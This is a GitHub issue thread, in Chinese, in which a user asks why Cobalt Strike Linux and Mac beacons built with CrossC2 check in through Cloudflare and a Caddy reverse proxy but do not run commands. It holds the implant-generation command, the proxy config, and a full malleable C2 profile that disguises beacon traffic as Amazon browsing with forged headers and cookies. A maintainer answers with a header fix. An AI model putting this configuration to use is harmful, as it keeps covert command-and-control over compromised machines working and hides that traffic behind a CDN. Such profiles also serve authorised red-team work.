cs4.4+cloudflare+caddy能上线但是无法执行命令 #226

kuron3k0 · 2024-07-26T04:59:18Z

问题描述：

目前是linux和mac都可以上线，但是无法执行命令，listener换成ip上线就可以执行，用了cloudflare之后无论开不开cdn都不行，也设置了以profile的url path开头的绕过缓存了，用的profile在windows上是可以正常运行的。

环境和配置：

生成木马
genCrossC2.MacOS vpsdomain 8443 ./.cobaltstrike.beacon_keys ;;/xxx/amazon.profile Linux x86 /tmp/t_cc2.out raw

用了caddy做了反向代理（v1）

https://vpdomain:8443 {
        tls /xxx/server.pem /xxx/server.key
        proxy /s/ https://127.0.0.1:18443 {
            insecure_skip_verify
            header_upstream X-Forwarded-For {http.request.header.CF-Connecting-IP}
        }
}

profile

#
# Amazon browsing traffic profile
#
# Author: @harmj0y
#

set sleeptime "5000";
set jitter    "0";
dns-beacon {
    set maxdns    "255";
}
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36";

https-certificate {
    set keystore "cs.store";
    set password "password";
}

http-config {
    set trust_x_forwarded_for "true";
}


http-get {

    set uri "/s/ref=sx_fk_boss_1/161237-88-7583756/field-keywords=animals";

    client {

        header "Accept" "*/*";
        header "Host" "vpsdomain";
        #header "Connection" "close";

        metadata {
            base64;
            prepend "session-token=";
            prepend "skin=noskin;";
            append "csm-hit=s-7KKN11BB82RZSYGJ3BDK|1418809012996";
            header "Cookie";
        }
    }

    server {

        header "Server" "Nginx";
        header "x-amz-id-1" "AGTJNFTGDWPGY5T42PZT";
        header "x-amz-id-2" "b89yZ2xFHbtVgGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Content-Encoding" "gzip";

        output {
            print;
        }
    }
}

http-post {

    set uri "/s/ref=K4805/adj/amzn.en.sr.aps";

    client {

        header "Accept" "*/*";
        #header "Content-Type" "text/xml";
        header "X-Requested-With" "XMLHttpRequest";
        header "Host" "vpsdomain";
        #header "Connection" "close";

        parameter "sz" "160x600";
        parameter "oe" "oe=ISO-8859-1;";

        id {
            parameter "sn";
        }

        parameter "s" "3717";
        parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";

        output {
            base64;
            print;
        }
    }

    server {

        header "Server" "Nginx";
        header "x-amz-id-1" "AGtYVBHT67PGY5T42OZT";
        header "x-amz-id-2" "tikJo1xrNnNtdGRsam19bGV30W85amZ8ZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "x-ua-compatible" "IE=edge";

        output {
            print;
        }
    }
}

The text was updated successfully, but these errors were encountered:

gloxec · 2024-07-26T05:27:12Z

需要确认命令执行后，是执行了没传回结果，还是直接没执行呢？
touch /tmp/aaaaa

kuron3k0 · 2024-07-26T05:56:54Z

emmm直接没有执行

gloxec · 2024-08-06T08:59:34Z

cs+nginx+cf_cdn该方式部署较为常见，是可正常通信控制功能

那应该是linux beacon端未收到teamserver下发的指令，可能原因是由于c2profile中配置的http头中的 Connection 值，因为linux beacon是严格按照c2profile内容做发送和接收的，而windows beacon在发送数据时，并不完全严格遵守c2profile设定的数据。

尝试c2profile中关于http-get/post修改内容为header "Connection" "close";，可能类似的问题见: #161

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

cs4.4+cloudflare+caddy能上线但是无法执行命令 #226

cs4.4+cloudflare+caddy能上线但是无法执行命令 #226

kuron3k0 commented Jul 26, 2024

gloxec commented Jul 26, 2024

kuron3k0 commented Jul 26, 2024

gloxec commented Aug 6, 2024

cs4.4+cloudflare+caddy能上线但是无法执行命令 #226

cs4.4+cloudflare+caddy能上线但是无法执行命令 #226

Comments

kuron3k0 commented Jul 26, 2024

问题描述：

环境和配置：

gloxec commented Jul 26, 2024

kuron3k0 commented Jul 26, 2024

gloxec commented Aug 6, 2024